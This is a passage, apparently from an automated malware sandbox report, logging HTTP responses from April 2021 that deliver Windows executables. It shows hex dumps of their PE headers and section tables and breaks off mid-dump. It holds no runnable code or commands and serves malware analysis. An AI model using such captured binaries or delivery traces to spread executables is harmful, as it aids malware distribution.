2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Apr 2021 20:58:44 GMTContent-Type: application/x-msdos-programContent-Length: 144848Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "235d0-57aa1f0b0df80"Expires: Thu, 29 Apr 2021 20:58:44 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Apr 2021 20:58:44 GMTContent-Type: application/x-msdos-programContent-Length: 83784Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "14748-57aa1f0b0df80"Expires: Thu, 29 Apr 2021 20:58:44 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Apr 2021 20:58:52 GMTContent-Type: application/octet-streamContent-Length: 290304Last-Modified: Wed, 28 Apr 2021 08:31:27 GMTConnection: keep-aliveETag: "60891d5f-46e00"Cache-Control: public, must-revalidate, proxy-revalidateAccept-Ranges: bytesData Raw: 4d